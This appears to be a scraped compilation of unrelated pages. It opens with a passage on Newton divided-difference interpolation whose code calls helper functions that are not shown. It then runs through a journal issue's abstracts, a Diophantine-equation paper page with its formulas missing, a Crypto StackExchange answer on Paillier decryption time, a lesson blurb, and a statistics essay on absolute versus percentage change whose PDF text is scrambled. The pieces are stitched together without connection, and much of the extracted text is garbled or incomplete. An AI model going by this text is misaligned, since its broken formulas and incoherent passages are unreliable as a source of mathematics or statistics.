P3(x) = 6x^3 - 20x^2 + 17x. The definition of monotonicity of a function can further be used to choose the least polynomial degree that is efficient and consistent. A concrete design task ties this together: suppose that we are designing the ln key for a calculator whose display shows six digits to the right of the decimal point; we can approximate this function using interpolation techniques such as Lagrange, Newton's forward-difference, Newton's backward-difference, Newton's central-difference, or Newton's divided-difference formulas, or spline interpolation.
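For the ln-key design just mentioned, here is a minimal sketch (ours, not from the original page; it assumes the `divided_differences` and `calculate_newton_interpolation` helpers from the earlier snippet are in scope) that interpolates ln at a few nodes on [1, 2] and reports the worst error against the six-decimal display requirement:

```python
import math

nodes = [1 + i / 6 for i in range(7)]            # 7 equally spaced nodes on [1, 2]
coeffs = divided_differences(nodes, [math.log(t) for t in nodes])

worst = max(abs(calculate_newton_interpolation(coeffs, nodes, x) - math.log(x))
            for x in (1 + j / 1000 for j in range(1001)))
print(f"max |p(x) - ln x| on [1, 2]: {worst:.1e}")   # compare with the 5e-7 target
```

If the printed error exceeds 5e-7 (the tolerance for six correct displayed decimals), more nodes, or better-placed Chebyshev nodes, are needed; that trade-off is exactly the design question for such a key.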
Interpolating polynomials also generate differentiation formulas. In general, we can use any of the interpolation techniques to develop an interpolating function of the required degree and differentiate it; the three-node case results in the generic central difference approximation to the second derivative, f''(x_i) ≈ (f(x_{i+1}) - 2 f(x_i) + f(x_{i-1})) / h^2 for grid spacing h. Here the coefficients of the polynomials are calculated using divided differences, which is why this method of interpolation is also known as Newton's divided difference interpolation polynomial. There is a close relationship between the Lagrange polynomial and the Newton polynomial: it is possible to obtain the Lagrange polynomial directly from Newton's formula via the concept of divided differences, and, similar to Lagrange's method, Newton's method finds the same interpolating polynomial because of the uniqueness of interpolating polynomials; the same is true for a Chebyshev interpolation polynomial built on Chebyshev nodes. Newton's divided difference method applies the recursive divided-differences construction and uses fewer computations than the Lagrange method; in a spreadsheet it is then just a simple matter of entering the formula for linear interpolation into the appropriate cell, and writing a Newton-Gregory forward interpolation program in C is a standard exercise. Performance still matters: one user computing the finite divided differences of an array with Newton's interpolating polynomial to determine y at x = 8 reported that the implementation could handle vectors of size about 20 (taking about 7 seconds at that size), while a vector of 10 took only a fraction of a second, a reminder that naive implementations scale poorly. Computer graphics offers a related case: a line drawing algorithm takes two points as parameters and must calculate the exact position of each pixel on the segment between them, which is linear interpolation at work. The same divided-difference machinery extends to Hermite interpolation, whose generated interpolating polynomial is closely related to the Newton polynomial in that both are derived from the calculation of divided differences, and applications of the method in control theory have also been highlighted.
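A quick check of the central-difference formula above (a self-contained sketch; the test function sin is our choice) against the exact second derivative:

```python
import math

def second_derivative(f, x, h=1e-4):
    # three-node central difference: (f(x+h) - 2 f(x) + f(x-h)) / h^2
    return (f(x + h) - 2 * f(x) + f(x - h)) / h**2

x = 0.7
print(second_derivative(math.sin, x))   # ~ -0.644217..., since (sin)'' = -sin
print(-math.sin(x))
```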
Divided differences have properties that make them pleasant to work with. One is the symmetry property, which states that the divided differences remain unaffected by permutations (rearrangements) of their variables. A divided difference may be defined recursively as the difference of two lower-order divided differences divided by the spread of their arguments; by computing the first divided differences, then the second, and so on, Newton's divided difference formula is assembled, and f1(x) designates a first-order interpolating polynomial. The same problem can often be set up either way: take a problem posed for backward interpolation and solve it by forward interpolation, or interpolate at order four using Newton's backward divided difference formula from the tabulated data; a typical exercise array is x = 0, 1, 2, 5, and the MATLAB-style comment "% Use Newton's forward difference to interpolate function f(x) at n+1 points" describes the equally spaced variant. In […], El-Mikkawy gives an algorithm based on Newton's divided difference interpolating polynomial, and this computational viewpoint answers the question of why the Lagrange polynomial interpolation method should be improved: the Newton form uses a smaller number of computations than the Lagrange method. A divided difference table also diagnoses the shape of data; in Section 3 of one such treatment, the table is used to interpolate by means of Newton's divided difference formula and to determine the corresponding interpolating cubic. Consider the data of Table 11, the divided difference table of a quadratic pattern:

| x | y  |
|---|----|
| 1 | 12 |
| 3 | 14 |
| 4 | 24 |
| 5 | 40 |

Its second divided differences are constant, so the data follow a quadratic; in the same spirit, tabulated physical quantities, such as the specific heat of water at 61 °C, are read off by interpolating the surrounding table entries. As Thiele, a numerical analyst, put it: "Interpolation is the art of reading between the lines of the table."
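The claim that Table 11 hides a quadratic can be checked with the `divided_differences` helper from the first snippet (a sketch; it assumes that function is in scope):

```python
x, y = [1, 3, 4, 5], [12, 14, 24, 40]
print(divided_differences(x, y))   # [12, 1.0, 3.0, 0.0]
```

The constant second divided differences (both interior entries equal 3) make the third-order coefficient vanish, so the interpolant is the quadratic p(x) = 12 + (x - 1) + 3(x - 1)(x - 3), which reproduces 14, 24, and 40 at x = 3, 4, 5.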
https://www.aimsciences.org/journal/1937-5093/2020/13/2
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"ISSN:\n1937-5093\n\neISSN:\n1937-5077\n\n## Journal Home\n\n• Open Access Articles",
null,
"All Issues\n\n## Kinetic & Related Models\n\nApril 2020 , Volume 13 , Issue 2\n\nSelect all articles\n\nExport/Reference:\n\n2020, 13(2): 211-247 doi: 10.3934/krm.2020008 +[Abstract](1403) +[HTML](137) +[PDF](533.06KB)\nAbstract:\n\nWe present a stochastic version of the Cucker-Smale flocking dynamics described by a system of \\begin{document}$N$\\end{document} interacting particles. The velocity aligment of particles is purely discontinuous with unbounded and, in general, non-Lipschitz continuous interaction rates. Performing the mean-field limit as \\begin{document}$N \\to \\infty$\\end{document} we identify the limiting process with a solution to a nonlinear martingale problem associated with a McKean-Vlasov stochastic equation with jumps. Moreover, we show uniqueness and stability for the kinetic equation by estimating its solutions in the total variation and Wasserstein distance. Finally, we prove uniqueness in law for the McKean-Vlasov equation, i.e. we establish propagation of chaos.\n\n2020, 13(2): 249-277 doi: 10.3934/krm.2020009 +[Abstract](1201) +[HTML](141) +[PDF](1670.08KB)\nAbstract:\n\nMotivated by modeling transport processes in the growth of neurons, we present results on (nonlinear) Fokker-Planck equations where the total mass is not conserved. This is either due to in- and outflow boundary conditions or to spatially distributed reaction terms. We are able to prove exponential decay towards equilibrium using entropy methods in several situations. As there is no conservation of mass it is difficult to exploit the gradient flow structure of the differential operator which renders the analysis more challenging. In particular, classical logarithmic Sobolev inequalities are not applicable any more. Our analytic results are illustrated by extensive numerical studies.\n\n2020, 13(2): 279-307 doi: 10.3934/krm.2020010 +[Abstract](1178) +[HTML](143) +[PDF](5653.39KB)\nAbstract:\n\nWe study spatially non-homogeneous kinetic models for vehicular traffic flow. Classical formulations, as for instance the BGK equation, lead to unconditionally unstable solutions in the congested regime of traffic. We address this issue by deriving a modified formulation of the BGK-type equation. The new kinetic model allows to reproduce conditionally stable non-equilibrium phenomena in traffic flow. In particular, stop and go waves appear as bounded backward propagating signals occurring in bounded regimes of the density where the model is unstable. The BGK-type model introduced here also offers the mesoscopic description between the microscopic follow-the-leader model and the macroscopic Aw-Rascle and Zhang model.\n\n2020, 13(2): 309-344 doi: 10.3934/krm.2020011 +[Abstract](1440) +[HTML](138) +[PDF](619.95KB)\nAbstract:\n\nWe consider the Fokker-Planck equation with an external magnetic field. Global-in-time solutions are built near the Maxwellian, the global equilibrium state for the system. Moreover, we prove the convergence to equilibrium at exponential rate. The results are first obtained on spaces with an exponential weight. 
Then they are extended to larger functional spaces, like certain Lebesgue spaces with polynomial weights and modified weighted Sobolev spaces, by the method of factorization and enlargement of the functional space developed in [Gualdani, Mischler, Mouhot, 2017].\n\n2020, 13(2): 345-371 doi: 10.3934/krm.2020012 +[Abstract](1385) +[HTML](162) +[PDF](435.49KB)\nAbstract:\n\nThis paper is devoted to Fokker-Planck and linear kinetic equations with very weak confinement corresponding to a potential with an at most logarithmic growth and no integrable stationary state. Our goal is to understand how to measure the decay rates when the diffusion wins over the confinement although the potential diverges at infinity. When there is no confinement potential, it is possible to rely on Fourier analysis and mode-by-mode estimates for the kinetic equations. Here we develop an alternative approach based on moment estimates and Caffarelli-Kohn-Nirenberg inequalities of Nash type for diffusion and kinetic equations.\n\n2020, 13(2): 373-400 doi: 10.3934/krm.2020013 +[Abstract](1016) +[HTML](135) +[PDF](414.61KB)\nAbstract:\n\nWe are concerned with the global existence and long time behavior of the solutions to the ES-FP model for diatomic gases proposed in . The global existence of the solutions for this model near the global Maxwellian is established by nonlinear energy method based on the macro-micro decomposition. An algebraic convergence rate in time of the solutions to the equilibrium state is obtained by constructing the compensating function. Since the density distribution function \\begin{document}$F(t, x, v, I)$\\end{document} also contains energy variable \\begin{document}$I$\\end{document}, we derive more general Poincaré inequality including variables \\begin{document}$v, I$\\end{document} on \\begin{document}$\\mathbb{R}^3\\times \\mathbb{R}^+$\\end{document} to establish the coercivity estimate of the linearized operator.\n\n2020, 13(2): 401-434 doi: 10.3934/krm.2020014 +[Abstract](1416) +[HTML](156) +[PDF](482.03KB)\nAbstract:\n\nWe study the asymptotic behavior of a second-order swarm model on the unit sphere in both particle and kinetic regimes for the identical cases. For the emergent behaviors of the particle model, we show that a solution to the particle system with identical oscillators always converge to the equilibrium by employing the gradient-like flow approach. Moreover, we establish the uniform-in-time \\begin{document}$\\ell_2$\\end{document}-stability using the complete aggregation estimate. By applying such uniform stability result, we can perform a rigorous mean-field limit, which is valid for all time, to derive the Vlasov-type kinetic equation on the phase space. For the proposed kinetic equation, we present the global existence of measure-valued solutions and emergent behaviors.\n\n2019 Impact Factor: 1.311"
https://nntdm.net/volume-27-2021/number-3/113-118/
"# A Diophantine equation about polygonal numbers\n\nYangcheng Li\nNotes on Number Theory and Discrete Mathematics\nPrint ISSN 1310–5132, Online ISSN 2367–8275\nVolume 27, 2021, Number 3, Pages 113—118\nDOI: 10.7546/nntdm.2021.27.3.113-118\n\n## Details\n\n### Authors and affiliations\n\nYangcheng Li",
null,
"School of Mathematics and Statistics, Changsha University of Science and Technology,\nChangsha, 410114, People’s Republic of China\n\n### Abstract\n\nIt is well known that the number",
null,
"is called the",
null,
"-th",
null,
"-gonal number, where",
null,
". Many Diophantine equations about polygonal numbers have been studied. By the theory of Pell equation, we show that if",
null,
"is a positive integer but not a perfect square,",
null,
"",
null,
",",
null,
"and the Diophantine equation",
null,
"has a nonnegative integer solution",
null,
", then it has infinitely many positive integer solutions of the form",
null,
", where",
null,
"and",
null,
",",
null,
".\n\n### Keywords\n\n• Polygonal number\n• Diophantine equation\n• Pell equation\n• Positive integer solution\n\n• 11D09\n• 11D72\n\n### References\n\n1. Bencze, M. (2012). Proposed problem 7508. Octogon Mathematical Magazine, 13(1B), 678.\n2. Cohen, H. (2007). Number Theory, Vol. I: Tools and Diophantine Equations, Graduate Texts in Mathematics.\n3. Deza, E., & Deza, M. M. (2012). Figurate Numbers, World Scientific.\n4. Dickson, L. E. (1934). History of the Theory of Numbers, Vol. II: Diophantine Analysis, Dover Publications.\n5. Guan, X. G. (2011). The squares with the form",
null,
". Natural Science Journal of Ningxia Teachers University, 32(3), 97–107.\n6. Guy, R. K. (2007). Unsolved Problems in Number Theory. Springer-Verlag.\n7. Hamtat, A., & Behloul, D. (2017). On a Diophantine equation on triangular numbers. Miskolc Mathematical Notes, 18(2), 779–786.\n8. Hu, M. J. (2013). The positive integer solutions of the Diophantine equation",
null,
". Journal of Zhejiang International Studies University, 4, 70–76.\n9. Jiang, M., & Li, Y. C. (2020). The linear combination of two polygonal numbers is a perfect square. Notes on Number Theory and Discrete Mathematics, 26(2), 105–115.\n10. Le, M. H. (2007). The squares with the form",
null,
". Natural Science Journal of Hainan University, 25(1), 13–14.\n11. Li, Y. C. (2020). Linear combinations of two polygonal numbers that take infinitely often a square value. Integers, 20, Article #A100.\n12. Peng, J. Y. (2019). The linear combination of two triangular numbers is a perfect square. Notes on Number Theory and Discrete Mathematics, 25(3), 1–12.\n13. Pla, J. (2014). On some subsets of the rational solutions of the equations",
null,
". The Mathematical Gazette, 98(543), 424–428.\n14. Sastry, K. R. S. (1993). A triangular triangle problem. Crux Mathematicorum, 19(8), 219–221.\n15. Sastry, K. R. S. (1993). Pythagorean triangles of the polygonal numbers. Mathematics and Computer Education Journal, 27(2), 135–142.\n16. Scheffold, E. (2001). Pythagorean triples of polygonal numbers. The American Mathematical Monthly, 108(3), 257–258.\n\n## Cite this paper\n\nLi, Y. (2021). A Diophantine equation about polygonal numbers. Notes on Number Theory and Discrete Mathematics, 27(3), 113-118, doi: 10.7546/nntdm.2021.27.3.113-118."
https://crypto.stackexchange.com/questions/87785/evaluate-the-time-of-paillier-decryption
"# Evaluate the time of Paillier decryption\n\nIf I have 4 kilobytes of Paillier encrypted data, how can I know the time needed to decrypt it?\n\n• Simple tining is the time command in Linux\\Unix and see Chrono for C++ Jan 25 at 18:31\n• I’m voting to close this question because has nothing to do with Cryptography.SE Jan 25 at 18:31\n• I know time commands but i was hoping to see if someone has a answer referenced by a research paper. I found some work on this but with bigger data sizes.\n– Mimi\nJan 25 at 21:03\n• Do you want to compare it to something else? Jan 25 at 21:59\n• I am comparing my algorithm that uses Paillier for encryption/decryption to another algorithm. So I am not comparing it to another encryption scheme.\n– Mimi\nJan 25 at 22:30\n\nYou need to know\n\n• The size $$s$$ of the public modulus $$n$$ in bits.\n• The number $$c$$ of cryptograms.\n• If the code uses the CRT, or not; and in the affirmative, the number $$k$$ of prime factors in $$n$$ (usually $$k=2$$ for $$n=p\\,q$$, with $$p$$ and $$q$$ distinct primes).\n• And of course, some benchmark of the code and hardware!\n\nEach cryptogram is $$2s$$-bit, thus for 4kbyte ciphertext (at most 2kbyte plaintext) $$c\\,s\\le2^{14}$$. The largest range/safer/slower for 4kbyte ciphertext is $$c=1$$, $$s=2^{14}$$ (that is 16384-bit $$n$$, which is rather large).\n\nAs a rough approximation, using the same computation means and $$k=2$$, Pailler decryption with CRT for $$s$$-bit public modulus $$n$$ ($$2s$$-bit cryptogram) is about as fast as RSA decryption with CRT for $$2s$$-bit modulus. Not using CRT in Pailler causes a moderate slowdown (at most a factor of $$2$$), less than in RSA. Time is proportional to $$c$$, and often normalized for $$c=1$$ in RSA benchmarks.\n\nExtremely roughly, Pailler decryption for $$c=1$$ is like 5 times slower than RSA decryption at equal size of $$n$$ and other stuff.\n\nLarge savings are possible by increasing $$k$$, like in multiprime-RSA.\n\n• @fgrieu- Thanks, will try to work it out using your hints.\n– Mimi\nJan 27 at 20:44"
https://www.nagwa.com/en/lessons/109140687920/
"# Lesson: Multiplying a Two-Digit Number by a One-Digit Number: Column Method with Regrouping Mathematics • 4th Grade\n\nIn this lesson, we will learn how to use the standard algorithm to multiply a two-digit number by a one-digit number for calculations where there is regrouping."
http://spotidoc.com/doc/196882/how-to-analyze-change-from-baseline--absolute-or-percenta.
"",
null,
"# How to Analyze Change from Baseline: Absolute or Percentage Change?\n\n```D-level Essay in Statistics 2009\nHow to Analyze Change from Baseline:\nAbsolute or Percentage Change?\nExaminer:\nLars Rönnegård\nAuthor:\nLing Zhang\nKun Han\nSupervisor:\nJohan Bring\nCoCo-supervisor:\nRichard Stridbeck\nDate:\nJune 10, 2009\nHögskolan Dalarna\n781 88 Borlänge\nTel vx 023-778000\nHow to Analyze Change from Baseline:\nAbsolute or Percentage Change?\nJune 10, 2009\nABSTRACT\nIn medical studies, it is common to have measurements before and after some medical interventions. How to measure\nthe change from baseline is a common question met by researchers. Two of the methods often used are absolute change\nand percentage change. In this essay, from statistical point of view, we will discuss the comparison of the statistical power\nbetween absolute change and percentage change. What’s more, a rule of thumb for calculation of the standard deviation of\nabsolute change is checked in both theoretical and practical way. Simulation is also used to prove both the irrationality of the\nconclusion that percentage change is statistical ine¢ cient and the nonexistence of the rule of thumb for percentage change.\nSome recommendations about how to measure change are put forward associated with the research work we have done.\nKey Words: Absolute Change, Percentage Change, Baseline, Follow-up, Statistical Power, Rule of Thumb.\nchange to evaluate the change of weight. Neovius (2007) also\nchose absolute change as the change measurement in their\nobesity research, while Kim (2009) chose percentage change\n1. Introduction\nto measure the fat lost in di¤erent part of an obese man’s\nbody in a weight loss program. In a cystic …brosis clinical\nn medical studies, a common way to measure treatment study, Lavange (2007) used percentage change as well. We\ne¤ect is to compare the outcome of interest before treat- see that, both of the two methods have been used in di¤erent\nment with that after treatment. The measurements before kinds of clinical studies.\nand after treatment are known as the baseline (B) and the\nThe properties of absolute change and percentage change\nfollow-up (F ), respectively. How to measure the change from\nhave\nbeen discussed by Tönqvist (1985). From his point of\nbaseline is a common question met by researchers. There\nview,\none of the advantages of percentage change is that perare many methods that can be used as the measure of di¤ercentage\nchange is independent of the unit of measurement.\nence. Two of them, which are used in a lot of clinical studies,\nFor\ninstance,\na man who weighs 100 Kg lost 10% of weight\nare absolute change (C = B F ) and percentage change\nafter\na\ntreatment,\ni.e. 10 Kg. Equivalently, he lost 22.05\n(P = (B F ) B). In di¤erent books and articles, absolute\npounds\n(1Kg\n=\n2:2046\nPounds). 10 Kg and 22.05 pounds are\nchange may also be called change, while percentage change is\nessentially\nthe\nsame\nweight,\nbut the absolute change scores\nalso called relative change.\nare\ndi¤erent.\nHowever,\nno\nmatter\nwhat the unit of measureThere is a simple example that will show us the di¤erence\nment\nis,\nthe\npercentage\nchange\nis\n10% all the time. 
More\nbetween absolute change and percentage change more clearly:\ndetails\nthe\nof\nabsolute\nchange can be found\nTwo obese men A and B participate in a weight loss program.\nin\nthe\narticle\nof\nTönqvist\n(1985).\nAlthough\nthere are many\nTheir weights at the beginning of the program are 150 Kg and\nfor\nthe\ntwo\nchange\nmeasurement\nmethods, Tön100 Kg, respectively. When they …nish the program, the man\nqvist\n(1985)\ndid\nnot\ngive\nany\nrecommendations\nA who weighs 150 Kg lost 15 Kg, while another man lost 10\nmake\na\nchoice\nbetween\nabsolute\nchange\nand\npercentage\nchange\nKg. From the example, we see that, the man A lost 5 Kg more\nbased\non\nthese\nproperties.\nthan that the man B, but the percent of weight they lost are\n10% in both cases. We want to know, which change measureIn other literatures, several suggestions about which\nment is best to show the treatment e¤ect of the weight loss method to choose are mentioned. Vickers (2001) suggested\nprogram.\navoiding using percentage change. That is because he comIn di¤erent clinical studies, either absolute change or per- pared the statistical power of di¤erent methods by doing\ncentage change may be chosen. In the study of healthy dieting a simulation and concluded that percentage change from\nand weight control, Waleekhachonloet (2007) used absolute baseline is statistically ine¢ cient. Kaiser (1989) also gave\nI\n1\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nsome recommendations for making a choice between absolute\nchange and percentage change. He suggested using the change\nmeasurement that has less correlation with baseline scores. A\ntest statistic developed by Kaiser (1989) was also derived, i.e.\nthe ratio of the maximum likelihood of absolute change to\nthat of percentage change. The absolute change is recommended if the value of the test statistic is larger than one,\nwhile percentage change is preferred when it is less than one.\nThat is, a simple rule helping researchers to make a choice\nquickly.\nActually, the primary consideration for choosing a change\nmeasurement method is di¤erent from di¤erent points of view.\nFrom a clinical point of view, we prefer to use a change measurement that may show the health-improvement for the patients in a more observable way. For example, in study of\nasthma, the primary outcome variable is often FEV (Forced\nExpiratory Volume L/s). The e¢ ciency of a treatment is\nevaluated by calculating the percentage change in FEV from\nbaseline. In hypertension studies, it is common to use the absolute change in blood pressure instead of percentage change.\nFrom statistical point of view, we prefer the method which\nhas the highest statistical power as Vickers (2001) did.\nAnother issue concerned by researchers is the standard\ndeviation of the treatment e¤ect (change scores). For two\nmedical interventions that may lead to the same expected\nchange, the e¤ect of the intervention that has a smaller standard deviation seems more stable and e¤ective. And clinicians may always prefer that medical intervention. Since it\nis not practical for researchers to get all the interested experimental datasets which recorded the details of baseline and\nfollow-up scores for p\neach patient, there is a rule of thumb\n21 . 
It may help calculating the stanSD (C)\nSD (B)\ndard deviation of change scores from the standard deviation\nof baseline scores.\nThe aim of this essay is to show, the statistical e¢ ciency\nof percentage change under some conditions in contrast with\nVickers’(2001) conclusion, and the rationality of the rule of\nthumb. The essay is organized as follows. The second section\nis the comparison of the statistical power of absolute change\nand percentage change by constructing a test statistic under\ncertain distribution assumption. In the third section, the rationality of rule of thumb is discussed in a theoretical way.\nSimulations of some of the issues discussed in section two and\nthree are carried out in the fourth section. The …fth section\nis an empirical investigation of the usefulness of the rule of\nthumb by using some real datasets. Finally, in the discussion\nsection, we discuss the results got from the previous sections,\nand give some suggestions.\n1 Personal\n2 However,\n2. Comparison of the statistical\npower of absolute change and\npercentage change\nI\nn clinical research, it is common to test whether there is a\ntreatment e¤ect after a medical intervention. In order to\ntest the treatment e¤ect, it’s necessary to choose a suitable\nmeasurement of the di¤erence between baseline and follow-up\nscores.\nFrom a statistical point of view, an important criterion for\na good statistical method is high statistical power. Therefore,\nfrom the two common change measurement methods, absolute\nchange and percentage change, the one with a higher statistical power will be preferred.\n2.1 Statistical Power\nAccording to the hypothesis testing theory, statistical power\nis the probability that a test reject the false null hypothesis.\nThe de…nition of statistical power can be expressed as\nequation (1).\nStatistical power = P (reject H0 j H0 is False)\n(1)\nwhere H0 is the null hypothesis.\nIn a t-test, equation (1) can be rewritten as equation (2).\nStatistical power = P (reject H0 j H0 is False)\n= P jtj > t =2\n= P (pt < )\n(2)\nwhere t =2 is the t-value under the signi…cant level in a\ntwo-side t-test, and pt is the p-value of the t-test.\nFrom expression (2), we may see that the larger the expected absolute value of the t-statistic is, the higher the statistical power will be.2 Equivalently, the smaller the expected\np-value is, the higher the statistical power will be. Therefore,\nfrom di¤erent measurement methods, we will choose the one\nthat has a larger expected absolute value of t-statistic or a\nsmaller expected p-value.\n2.2 A Clinical Example of Blood Pressure\nDrug Experiment\nTo easily interpret the di¤erence of two measurement methods, an example from a clinical trial is shown in Table 1. In\nthe table, there are the records of the supine systolic blood\npressures (in mmHg) for 5 patients before and after taking\nthe drug captopril.\nLet (Bj ; Fj ) denote a baseline/follow-up pair of scores for\npatient j in the treatment group, j = 1; 2;\n; n. Then, we\ncommunication Prof. Johan Bring, E-mail: [email protected]\nit must be emphasized that, in this essay, “statistical power” actually means something slightly di¤erent from this.\nZhang, L. and Han, K. (2009)\n2/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\ncan get absolute change Cj = Bj Fj and percentage change\nPj = (Bj Fj ) Bj for patient j by calculating from the\nbaseline Bj and follow-up Fj scores immediately.\nIn this example, j is the patients’ ID number, and here\nn = 5. 
In columns 2 and 3, there are baseline and followup scores for each patient. Absolute change and percentage\nchange that calculated from baseline and follow-up scores are\nshown in column 4 and 5, respectively.\nTable 1. Supine systolic blood pressure (in mmHg) for 5\npatients with moderate essential hypertension, immediately\nbefore and after taking the drug captopril3\nID Baseline Follow-up Absolute Percentage(%)\n(j)\n(Bj )\n(Fj )\n(Cj )\n(Pj )\n1\n210\n201\n9\n4.3\n2\n169\n165\n4\n2.4\n3\n187\n166\n21\n11.2\n4\n160\n157\n3\n1.9\n5\n167\n147\n20\n12.0\n(Cj = Bj Fj ; Pj = 100 (Bj Fj ) Bj )\nabsolute change and percentage change are asymptotic normally distributed, i.e.\nC\nP\nN\nN\nC;\nP;\n2\nC\n2\nP\nwhere C and C are the mean and the standard deviation\nof C, P and P are the mean and the standard deviation of\nP , respectively.\nIn this case, t-test can be used for both absolute change\nand percentage change. For absolute change, the null hypothN C ; 2C , we get\nesis of t-test is H0 : C = 0. From C\nthe t-statistic for an absolute change t-test is\nC 0\nC\n=\n(3)\nbC\nbC\nwhere bC is an estimate of the standard deviation of absolute change.\nSimilarly, in the percentage case, the null hypothesis of\nt-test is H0 : P = 0 . From P\nN P ; 2P , we get the\nt-statistic for a percentage change t-test is\ntC =\nFrom Table 1, we see that there is a decreasing e¤ect for\nP 0\nP\ntP =\n=\n(4)\nthe blood pressure of each patient after taking the drug capbP\nbP\ntopril. Absolute change and percentage change show the dewhere bP is an estimate of the standard deviation of percrease in di¤erent ways. From a statistical point of view, we\ncentage\nchange.\nshould compare the statistical power for the two methods.\nWe have mentioned the relation between statistical power\nand the absolute value of t-statistic. We know that, when\n2.3 Comparison of Statistical Power\nthe signi…cant level is …xed, if the expected absolute value\nof\nthe t-statistic of absolute change is larger, the statistical\nWe have mentioned that Vickers (2001) compared the statispower\nof that will be higher. The opposite is also true, i.e.\ntical power of di¤erent methods by doing a simulation. However, his conclusion just based on an ideal simulation procedure, and he did not compare the statistical power theoretically. Kaiser (1989) developed a test statistic which compared\nE bCC\nthe maximum likelihood of the two methods. It has nothing\nE (jtC j)\n>1\n(5)\nR =\n=\nto do with statistical power. But Kaiser (1989) gave an idea\nP\nE (jtP j)\nE\nb\nthat it is easier to do comparison by constructing a ratio test\nP\nstatistic.\nStatistical P ower of Absolute Change\n,\n>1\nFor comparison of the statistical power of the two methStatistical P ower of P ercentage Change\nods, we construct a ratio test statistic by using the test stawhere E (jtC j) and E (jtP j) are the expected absolute value\ntistic or p-value of the treatment e¤ect test. Before that, we\nneed to know the distributions of absolute change and per- of the t-statistic of absolute change and percentage change,\ncentage change. That is because, for di¤erent distributions of respectively.\nSo, when R > 1, absolute change has higher statistiabsolute change or percentage change, di¤erent test methods\nwill be used. In order to construct a ratio test statistic, we cal power than percentage change, and we choose absolute\nshould know the test statistics used in both numerator and change. 
If R < 1, the percentage change with the higher\nstatistical power is preferred.\ndenominator of the ratio test statistic.\nIn the case of small sample size, it is common to assume\nthat one of the distributions of absolute change and percent2.3.1 When t-test is Suitable for both Absolute\nage change is normal. In some speci…c situation, both abChange and Percentage Change\nsolute change and percentage change may be normally disWhen the sample size n of the clinical experiment is large, tributed. Even though for a dataset that is not normally disaccording to the Central Limit Theorem, both the mean of tributed, if the distribution is close to normal distribution or\n3 Hand, DJ, Daly, F, Lunn, AD, McConway, KJ and Ostrowski, E (1994): A Handbook of Small Data Sets. London: Chapman and Hall.\nDataset 72\nZhang, L. and Han, K. (2009)\n3/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nthe distribution is symmetric without extreme observations,\nt-test may also be used. In that situation, the test statistic R\nis also applicable.\nIf we simulate some datasets, by using the ratio test statistic R, we can compare the statistical power of the absolute\nchange and percentage change of the datasets that we simulated. In contrast with Vickers’(2001) claim, some datasets\nwith R < 1 will be shown, which re‡ects that percentage\nchange has higher statistical power than absolute change under some conditions. In the simulation section, we will talk\nmore about the comparison of the statistical power of the two\nmethods.\n2.3.2 When the t-test is not suitable for At Least One\nTest\nFor the cases when the assumptions for the t-test are not\nsatis…ed for at least one of the tests, another test should be\nconsidered. Wilcoxon rank sum test4 is an alternative method\nproposed by Wilcoxon (1945). Bonate (2000) mentioned that\nit is the non-parametric counterpart to the paired samples\nt-test and should be used when normal assumptions are violated. He suggested that the Wilcoxon rank sum test is always\na better choice when the distribution of the data is unknown\nor uncertain. Therefore, when the paired samples t-test does\nnot work, we choose Wilcoxon rank sum test instead.\nSince we can not use t-statistic to construct the ratio test\nstatistic any more, we may choose to use the expected p-value\nof the treatment e¤ect test.\nSimilarly to (5), according to what is mentioned in equation (2), we may construct another ratio test statistic R0 by\ntaking the ratio of expected p-value, i.e.\nstatistical power than percentage change, and we choose absolute change. For R0 > 1, the percentage change is preferred.\nIn this section, another ratio test statistic R0 for nonnormal distribution situation is discussed. This is the supplement of the normal distribution case. In the following simulation part, we will concentrate more on the normal distribution\ncase shown in subsection 2.3.1, and the details in subsection\n2.3.2 will not be discussed any more.\n3. Rule of Thumb for the Standard\nDeviation of Change Scores\nT\nhe standard deviation of the treatment e¤ect is an important parameter that is of interest in the planning of\nstudies. The standard deviation of the change scores is the\nfocus in the second section of this essay. For the case when\nt-test may be used instead of a non-parametric test, in order to calculate the ratio test statistic R, we should work out\nboth the mean and the standard deviation of absolute change\nand percentage change …rst. 
It is easy to get these values in\ncase the datasets of the experiment which give the baseline\nand follow-up scores for each patient are known. However, in\nclinical research, it is not always possible and practical to get\nthe scores for each patient, especially in the planning phase of\na study. If we require some datasets to support our research\nwork, we may …nd some experiment datasets interesting for\nour research from experiments that someone else has done.\nOne of the good ways to …nd the datasets is searching from\npublished clinical articles. Most of the time, we may …nd some\nexamples in these articles which show us the summary of the\nE (pC )\n<1\n(6) baseline scores, the follow-up scores, and their standard deviR0 =\nE (pP )\nations. And we may get relevant datasets from these tables.\nStatistical P ower of Absolute Change\n,\n>1\nHowever, the scores for each patient in these clinical research\nStatistical P ower of P ercentage Change\narticles are seldom published. In this case, how can we know\nwhere E (pC ) and E (pP ) are the expected p-value of ab- the standard deviation of the change scores?\nThere is a rule of thumb which describes the relationship\nsolute change and percentage change, respectively.\nFor the cases that t-test still works, E (pC ) = E (ptC ) between the standard deviation of the change scores and that\nand E (pP ) = E (ptP ), where E (ptC ) and E (ptP ) are the ex- of the baseline scores.\npected p-value of the t-test for absolute change and percentage\nSD (B)\nchange, respectively. When Wilcoxon rank sum test is used\np\n(7)\nSD (C)\n2\ninstead of t-test, E (pC ) = E (pC W ilcoxon ) and E (pP ) =\nE (pP W ilcoxon ). E (pC W ilcoxon ) and E (pP W ilcoxon ) are\nthe expected p-value of the Wilcoxon rank sum test for ab- 3.1 Theoretical Derivation of the Rule of\nsolute change and percentage change, respectively. Therefore, Thumb for Absolute Change\nwe may get three di¤erent alternative forms for the ratio test\nThe general expression for the rule of thumb of absolute\nstatistic R0 .\nchange is\nWe have talked about that the smaller the expected pvalue is, the higher the statistical power will be. When the sigSD (B)\nSD (C) =\n(8)\nni…cant level is …xed, if R0 < 1, absolute change has higher\nk\n4 Wilcoxon\nrank sum test is a non-parametric test for assessing whether two independent samples of observations come from the same distribution.\nZhang, L. and Han, K. (2009)\n4/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\np\nV ar (B) V ar (F )(10)\np\n= V ar (B) + mV ar (B) 2r V ar (B) mV ar (B)\np\n= (1 + m) V ar (B) 2r mV ar (B)\np\n= 1 + m 2r m V ar (B)\n= V ar (B) + V ar (F )\np\n2\n2rSD (B)\n1.2\n1.0\n0.0\n0.2\n0.4\n0.6\n0.8\n1.0\nCorrelation Coefficient r\nFigure 1. Relation curve between the standard deviation of\nabsolute change SD (C) and the correlation coe¢ cient r\nwhen 